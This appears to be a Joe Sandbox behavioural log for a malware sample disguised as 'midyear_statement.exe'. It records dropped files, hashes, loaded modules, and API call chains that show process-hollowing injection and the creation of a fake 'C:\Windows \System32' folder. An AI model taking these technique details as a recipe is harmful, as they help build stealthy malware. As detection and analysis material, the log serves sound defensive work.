Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040B78F6 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory, 0_2_040B78F6
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_123480EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError, 24_2_123480EF
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_123432D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle, 24_2_123432D2
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1234BB35 OpenProcess,NtResumeProcess,CloseHandle, 24_2_1234BB35
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1234BB09 OpenProcess,NtSuspendProcess,CloseHandle, 24_2_1234BB09
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 27_2_0040DD85
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_00401806 NtdllDefWindowProc_W, 27_2_00401806
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_004018C0 NtdllDefWindowProc_W, 27_2_004018C0
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 28_2_004016FD NtdllDefWindowProc_A, 28_2_004016FD
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 28_2_004017B7 NtdllDefWindowProc_A, 28_2_004017B7
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040B7EE8 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 0_2_040B7EE8
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_123467B4 ExitWindowsEx,LoadLibraryA,GetProcAddress, 24_2_123467B4
Source: C:\Users\user\Desktop\midyear_statement.exe File created: C:\Windows \System32\2506803.exe
Source: C:\Users\user\Desktop\midyear_statement.exe File created: C:\Windows \System32\netutils.dll
Source: C:\Users\user\Desktop\midyear_statement.exe File created: C:\Windows \System32\KDECO.bat
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Windows 
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Windows \System32
Source: C:\Users\user\Desktop\midyear_statement.exe File deleted: C:\Windows \System32\netutils.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040A20C4 0_2_040A20C4
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_004057B8 24_2_004057B8
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_005CF0DD 24_2_005CF0DD
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_005B817F 24_2_005B817F
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_005E410D 24_2_005E410D
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_005C82C8 24_2_005C82C8
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_005CF33A 24_2_005CF33A
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_005C9552 24_2_005C9552
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_005C86E0 24_2_005C86E0
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_005C4728 24_2_005C4728
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_005DE7AB 24_2_005DE7AB
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_005B8828 24_2_005B8828
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_005AE944 24_2_005AE944
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_005B8991 24_2_005B8991
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_005C8B15 24_2_005C8B15
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_005B7BF0 24_2_005B7BF0
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_005C6C40 24_2_005C6C40
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_005CEC7F 24_2_005CEC7F
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_005C7DCC 24_2_005C7DCC
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_005A4DAC 24_2_005A4DAC
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_005AFEDC 24_2_005AFEDC
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_005CEEAE 24_2_005CEEAE
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_005C8F4A 24_2_005C8F4A
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_005E4F3B 24_2_005E4F3B
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_005D6FD2 24_2_005D6FD2
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1236E2FB
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1238332B
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1235739D
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1234F0FA
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_123470C2
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1236E0CC
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12347121
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12347104
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12368168
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12384159
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_123761F0
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_123686E8
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12368770
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_123674E6
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1236E558
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12357A46
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1234DB62
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12357BAF
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_123678FE
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12363946
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1237D9C9
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12356E0E
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12365E5E
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1236DE9D
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12366FEA
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12343FCA
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12367D33
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1464B5C1
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_14657194
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_0044B040
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_0043610D
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_00447310
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_0044A490
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_0040755A
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_0043C560
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_0044B610
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_0044D6C0
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_004476F0
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_0044B870
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_0044081D
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_00414957
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_004079EE
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_00407AEB
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_0044AA80
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_00412AA9
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_00404B74
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_00404B03
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_0044BBD8
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_00404BE5
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_00404C76
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_00415CFE
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_00416D72
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_00446D30
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_00446D8B
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_00406E8F
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 28_2_00405038
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 28_2_0041208C
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 28_2_004050A9
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 28_2_0040511A
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 28_2_0043C13A
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 28_2_004051AB
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 28_2_00449300
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 28_2_0040D322
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 28_2_0044A4F0
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 28_2_0043A5AB
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 28_2_00413631
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 28_2_00446690
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 28_2_0044A730
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 28_2_004398D8
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 28_2_004498E0
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 28_2_0044A886
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 28_2_0043DA09
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 28_2_00438D5E
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 28_2_00449ED0
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 28_2_0041FE83
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 28_2_00430F54
Source: Joe Sandbox View Dropped File: C:\Users\Public\Libraries\wkrriuhD.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
Source: Joe Sandbox View Dropped File: C:\Windows \System32\2506803.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: String function: 040A47D0 appears 931 times
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: String function: 040A4470 appears 67 times
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: String function: 040A4668 appears 250 times
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: String function: 040B7B88 appears 45 times
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: String function: 040A660C appears 33 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: String function: 004169A7 appears 87 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: String function: 004165FF appears 35 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: String function: 005C5552 appears 41 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: String function: 00422297 appears 42 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: String function: 12364E10 appears 54 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: String function: 00592C47 appears 34 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: String function: 0040A6C4 appears 68 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: String function: 0044DB70 appears 41 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: String function: 12332093 appears 50 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: String function: 005C5BF2 appears 54 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: String function: 00444B5A appears 37 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: String function: 12331E65 appears 35 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: String function: 00413025 appears 79 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: String function: 12364770 appears 41 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: String function: 00416760 appears 69 times
Source: netutils.dll.0.dr Static PE information: Number of sections : 19 > 10
Source: midyear_statement.exe Binary or memory string: OriginalFilename vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000003.1190782910.000000007FD60000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000002.1366143666.0000000002A80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000003.1291692035.0000000015C05000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000002.1381770717.0000000016137000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000002.1382468437.0000000016170000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000002.1380482770.0000000015C00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs midyear_statement.exe
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: url.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: archiveint.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: eamsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: smartscreenps.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: amsi.dll
